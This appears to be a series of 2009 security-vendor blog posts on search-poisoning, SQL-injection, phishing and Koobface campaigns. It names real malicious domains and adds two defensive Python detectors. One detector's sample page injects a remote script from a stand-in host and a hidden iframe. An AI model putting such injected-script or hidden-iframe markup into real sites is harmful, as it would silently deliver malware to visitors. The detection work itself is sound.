Tuesday, December 15, 2009

Boeing 787 Searches Hijacked by Rogue AV


Today, the Boeing 787 Dreamliner jet completed its much awaited first flight. As users searched to find videos and news articles related to the story, blackhats quickly moved in for yet another attack against Google search results.

The most popular search for several hours today was “787 first flight video”. This search and related searches are saturated with malicious results leading to rogue AV and potentially other malicious payloads.

At peak hours, 5 out of the first 9 results led to malicious payloads, as users were pushed through a series of redirect pages to different distribution points.

While the distribution points and payloads varied, their effectiveness did not. Most sites were undetected by Google Safe Browsing and the malicious payloads they delivered had very low anti-virus detection rates.

This latest attack is nothing new, but it is shocking how quickly and effectively cybercriminals are able to react to the latest news trends. In this particular attack, the dangerous top results seemed to be compromised sites with existing reputations, which makes detection much more difficult.

Saturday, December 12, 2009

eSoft Uncovers 1.5 Million Sites in SQL Injection Attacks

The eSoft Threat Prevention Team has uncovered an additional 1.5 million sites associated with the newest series of SQL injection attacks. Any compromised sites are very dangerous, infecting the user with Trojan.Buzus silently in the background. The Buzus family of trojans can steal passwords, financial data, and other sensitive information.

Note: Any sites listed below are dangerous and should not be followed without proper protection.

The compromised pages are injected with the same script several times in and around the title and meta tags, as well as other locations. Injected sites in this attack share the common characteristic of “script src=http” and a varying script source.

The list below shows the injected domains used in this attack. The number next to each domain is the number of sites found to be injected with the domain using Google search.

Each domain hosts the same JavaScript, using small or hidden iframes to redirect users to other malicious sites where the final payload is delivered. These domains use the same technique described by Scansafe last week in the 318x injection, in which as many as 300,000 sites were reported compromised. An example is shown below; each of the sites in the image is also dangerous, so do not attempt to view the linked sites.

Additionally, the Threat Prevention Team uncovered the related sites below, also using the same type of injection and JavaScript iframe technique. The JavaScript shown below is slightly different from that of the first attack, using only two iframes but infecting users and tracking them with the same method.
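The two injection traits described above (the same remote script repeated in and around the title and meta tags, and small or hidden iframes doing the redirect) can be checked for mechanically. The scanner below is an added example written for this post, not eSoft's tooling; the sample page and the evil.example hostname are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample page carrying the pattern described in the post: one remote
# script injected three times around <title> and <meta>, plus a 1x1 hidden iframe.
SAMPLE_HTML = """<html><head>
<script src=http://evil.example/x.js></script><title>Shop</title>
<script src=http://evil.example/x.js></script>
<meta name="description" content="shop"><script src=http://evil.example/x.js></script>
</head><body><p>hello</p>
<iframe src="http://evil.example/f.html" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""

class InjectionScanner(HTMLParser):
    """Collect remote <script src=http...> tags inside <head> and tiny/hidden iframes."""
    def __init__(self):
        super().__init__()
        self.in_head = False
        self.head_scripts = []    # remote script src values seen inside <head>
        self.hidden_iframes = []  # iframe src values that are 0/1 px or hidden via CSS

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "head":
            self.in_head = True
        elif tag == "script" and self.in_head:
            src = a.get("src") or ""
            if re.match(r"https?://", src, re.I):   # the "script src=http" trait
                self.head_scripts.append(src)
        elif tag == "iframe":
            w, h = (a.get("width") or ""), (a.get("height") or "")
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = w.strip("\"'") in ("0", "1") or h.strip("\"'") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.hidden_iframes.append(a.get("src") or "")

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False

def scan_page(html):
    """Return the repeated remote head scripts, hidden iframes, and an overall verdict."""
    p = InjectionScanner()
    p.feed(html)
    repeated = {s for s in p.head_scripts if p.head_scripts.count(s) > 1}
    return {"repeated_head_scripts": sorted(repeated),
            "hidden_iframes": p.hidden_iframes,
            "suspicious": bool(repeated or p.hidden_iframes)}
```

Run it over a crawl of your own pages: a remote script that appears more than once in the head, or any iframe a visitor cannot see, is a strong sign the page was injected rather than edited by its owner.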


eSoft is adding detection for these attacks and flagging any victimized sites as compromised. Distribution and redirect sites are marked as malicious, protecting users from downloading the final dangerous payload.

Wednesday, December 9, 2009

Fraudsters Deliver Another Round of Federal Reserve Emails

During the last week, the eSoft Threat Prevention Team has detected a number of malicious emails, allegedly from the Federal Reserve Bank. The emails warn the recipient of phishing attacks and instruct the user to follow a link for more detailed information on the threat.

The email appears to be legitimate, sporting the Federal Reserve emblem and containing a real-looking domain, federalreservebank-oh.com. However, users following the link are exposed to malicious payloads, most recently the Oficla Trojan.

Similar Federal Reserve Bank scams have been around for quite some time and are often used for phishing attacks. Example URLs contained in this newest rash of emails are shown below.

Always be cautious in following links in emails, particularly unexpected messages. If there is any doubt, contact the sender directly to verify the legitimacy of the message. The Threat Prevention Team is flagging these URLs as malicious, protecting SiteFilter customers from this threat. 

Friday, November 20, 2009

Scareware Taints Chromium OS Searches

Yesterday, Google announced the open source project called Chromium OS, a development phase release of the Google Chrome OS. Blackhats have quickly taken advantage of this announcement, poisoning search results to spread scareware.

Attackers continue to perform Blackhat SEO attacks on Google searches, particularly trending topics. Dangerous results are returned linking the user to Rogue Anti-Virus downloads through a series of scripts and redirects.

The search terms used in this example are "chromium os download", though any combination of terms could return dangerous results. The 5th result in the search below leads to scareware.

Clicking the link takes the user through a series of redirects, ultimately ending up at the distribution point. As with most Rogue AV scams, a fake system scan is performed informing the user their system is virus laden and opening a download to remove the threat.

Even if the user attempts to cancel, the rogue installer starts to download a setup.exe file. The file has low anti-virus detection, as is common with Rogue AV scams, and the user is led to believe the download is safe to install.

After a standard installation, the user is now infected with "SecureKeeper". This is a brand new variant first reported by Sunbelt just yesterday. 
After running another fake system scan, the software reports 736 infections and prompts the user to enter a registration key, or purchase the software. Some very scary messages are displayed, warning the user that criminals will gain access to their credit card and personal information.

Warnings will perpetually appear in the system tray, persuading the user to complete the purchase. For just $49.95 USD you can own this piece of malware...

This is a very typical attack that continues to happen all too often. Attackers will regularly change redirect URLs, malware distribution points and final payloads. This allows them to keep PageRank high and evade detection by anti-virus programs and web filters. The sites are further protected by checking the referring site to ensure the infected page can only be accessed from Google search results.

Raising awareness about this type of scam is one of the most effective ways to keep users safe. Other search engines are targeted less by attackers, which may make them safer for the novice user. eSoft tracks attacks on trending topics and is marking any associated sites as malicious.

Tuesday, November 17, 2009

Blackhats Unleash Another Fake Blog Campaign

In September, eSoft reported as many as 720,000 compromised sites hosting fake blog pages and being used to distribute rogue anti-virus programs. Many of these sites are still active and continue to plague searches with malicious results.

Earlier today, Cyveillance issued this report of a nearly identical attack with over 260,000 dangerous URLs, prompting the Threat Prevention Team to revisit this threat.

Between the newly reported Cyveillance URLs and additional URLs discovered by eSoft, there are now well over 800,000 active URLs matching this pattern. Surprisingly, Google only detects a small portion of these sites as malicious.

The key to this scheme is JavaScript uploaded to the compromised server and used in the fake blog pages. The file, css.js, contains obfuscated JavaScript that redirects users to Rogue AV if the site is accessed through certain search engines.

Using this technique allows the attackers to quickly and easily change distribution points and payloads. The current payloads have low detection rates among AV scanners.

In addition to the URL strings reported by Cyveillance, be on the lookout for these additional URL types.

eSoft will continue to flag associated domains into their appropriate security categories, protecting SiteFilter users from falling victim to this attack.

Thursday, November 12, 2009

CoolerEmail Hit by Phishing Scam

CoolerEmail is notifying customers of a new phishing scam used to steal login credentials. The web based email marketing program carries an impressive client list including Walmart, Toyota, Pepsi and dozens of other big name brands. Any phished credentials can be used to impersonate these companies in additional phishing or malicious emails.

If you’ve been victimized by this scam change your password immediately at the CoolerEmail website.

The fraudsters use a classic phishing “hook” and present a very real looking email, complete with company letterhead. The email reports a recent software upgrade and asks users to follow a link in order to confirm their account details.

The disguised link suggests the user will connect directly to the cooleremail.com website. However, the link actually connects to cooleremail1.com – a domain set up by cybercriminals specifically for the phish.

Whois information shows this domain was recently registered and is not in any way affiliated with CoolerEmail.



CoolerEmail has sent out a warning notice to customers and stated that they would never ask for confirmation of account details. Always be wary of emails containing any type of link or asking to update account information. If there is any doubt, contact the sender to verify the legitimacy of the email. 

Thursday, November 5, 2009

Japanese Hosting Site Compromised

The eSoft Threat Prevention Team is today warning users to be wary of sites hosted on g0oo.info, a Japanese hosting site.  At this time, all blogs and other web sites hosted by g0oo.info are compromised and currently being used to boost the Google PageRank of various sites including Japanese pornography sites in a technique sometimes called "PageRank Bombing" and also referred to as "BlackHat SEO."

At a glance, these sites look normal, but at the bottom of the page is a small portion of a box that actually holds around 300 links to questionable and pornographic websites.  The Threat Prevention Team has found thousands of unique links so far.  At any time, the g0oo.info sites could be repurposed to something more dangerous, as could the target pornography websites.

Sample URL associated with the scheme:

eSoft has now flagged thousands of these URLs as "Compromised" and/or "Pornography" as appropriate in order to protect customers and partners who use eSoft's SiteFilter database and block those categories.

Friday, October 23, 2009

Phishing Criminals Take Aim at Yahoo Ad Services

Yahoo! Marketing users are the target of a new phishing scam being detected today by the eSoft Threat Prevention Team. Webmasters receive a very believable notification that their Yahoo Marketing account has expired with a link to login and presumably reactivate the account.

If the user follows the link, they’re presented with an authentic looking login page where the phishing attack takes place. The username and password entered here are delivered to the attackers for further exploitation. With these credentials, criminals can hijack paid advertisements, replacing legitimate ads with their own malicious links or code.

The “hook” in this scam is a classic warning of impending account closure.  The domain being used to serve the phishing attack was registered only today, but has an authentic ring to it. The URLs also use a marketingsolutions.yahoo subdomain to make the URL seem more authentic.

At the time of detection, none of the major search engines or public phishing lists detected this URL as malicious.
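Both this phish and the CoolerEmail one above rely on link deception: visible text naming the real domain while the href points to a look-alike (cooleremail1.com), or the real brand planted as a subdomain (marketingsolutions.yahoo.*) of a freshly registered domain. The checker below is an added example for mail-gateway or awareness tooling, not eSoft's code; the attacker.example hostname is a constructed placeholder, and the registrable-domain logic is a deliberately naive last-two-labels rule.

```python
from urllib.parse import urlparse

# Constructed (text, href) pairs modelled on the two phishing emails in the posts above.
SAMPLE_LINKS = [
    ("cooleremail.com", "http://cooleremail1.com/login"),                         # look-alike domain
    ("Yahoo! Marketing", "http://marketingsolutions.yahoo.attacker.example/login"),  # brand as subdomain
    ("cooleremail.com", "https://www.cooleremail.com/account"),                    # legitimate
]

def registrable_domain(host):
    """Naive eTLD+1: the last two labels. No public-suffix list, so co.uk-style hosts
    are mis-split; good enough to demonstrate the checks on the cases in the posts."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()

def check_link(text, href, trusted_domains):
    """Return the reasons a link looks deceptive (empty list means nothing suspicious)."""
    reasons = []
    host = urlparse(href).hostname or ""
    reg = registrable_domain(host)
    # 1. Visible text that looks like a domain but resolves to a different registrable domain.
    shown = text.strip().lower()
    if "." in shown and " " not in shown and registrable_domain(shown) != reg:
        reasons.append(f"text shows {shown} but link goes to {host}")
    # 2. A trusted brand name used anywhere in the hostname while the registrable
    #    domain is not the trusted one (covers cooleremail1.com and *.yahoo.attacker.example).
    for trusted in trusted_domains:
        brand = trusted.split(".")[0]
        if reg != trusted and any(brand in label for label in host.split(".")):
            reasons.append(f"'{brand}' appears in {host} but the domain is {reg}, not {trusted}")
    return reasons

def audit_links(links, trusted_domains):
    """Map each flagged href to its reasons; hrefs with no findings are omitted."""
    findings = {}
    for text, href in links:
        reasons = check_link(text, href, trusted_domains)
        if reasons:
            findings[href] = reasons
    return findings
```

A hit on check 2 deserves a registration-date lookup before deciding, since both posts note the phishing domains were registered within days of use.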

Wednesday, October 21, 2009

Compromised Web Servers Host Koobface Malware Cocktail

The Koobface gang has struck again using compromised web servers to deliver a potent mix of malware. eSoft threat researchers have found hundreds of newly exploited sites hosting malware which includes downloaders, keyloggers and multiple variants of the Koobface worm.

Attackers using compromised sites to deliver their malware stand a better chance of evading web filters since those sites are generally already categorized in a "safe" category. The constant changing of the malware binaries also keeps the Anti-Virus detection rates low.

eSoft has noted a constant stream of new malware files coming from these sites.

Koobface is a social network worm that spreads using social engineering techniques. Users will typically receive a link to an alleged video. After clicking the link, the user is prompted to update their Flash player or download a codec to view the video. Users who haven't been trained to be skeptical of such requests follow the directions, infecting their machine and allowing the worm to spread through available social networks using the local user's accounts and targeting the infected user's friends, family and business contacts. This social networking aspect is part of the lure of the social engineering and why it's so successful. The video might require a download to view, but it came from a close friend, so it is probably fine.

The keyloggers hosted on the compromised sites can be used to steal any kind of sensitive personal information. Koobface will often steal login credentials for social networking sites which it can then use to send more messages and infect more machines.

The compromised sites in this attack are in a format that looks something like this:

eSoft is flagging these sites as 'Compromised'.

Friday, October 16, 2009

Unresolved Compromised Fox Sports Host Heading Into Third Week

eSoft first detected a compromise on the Fox Sports website two weeks ago and as of today, at least one Fox Sports host continues to contain automatic links to a multitude of dangerous exploits. Even with media coverage and direct emails, this compromised host has not been taken offline or cleaned. The threats being hosted have rotated with the most recent threats being remote script links to ackworld.com and nt002.cn.

akcworld.com has been hosting a multitude of Gumblar exploited pages that are leading to dangerous trojans.

nt002.cn has been hosting a variety of exploits, most recently targeting the Microsoft Video Control ActiveX vulnerabilities.

We hope that with further attention and pressure, the Fox Sports administrators will address this problem before another week passes.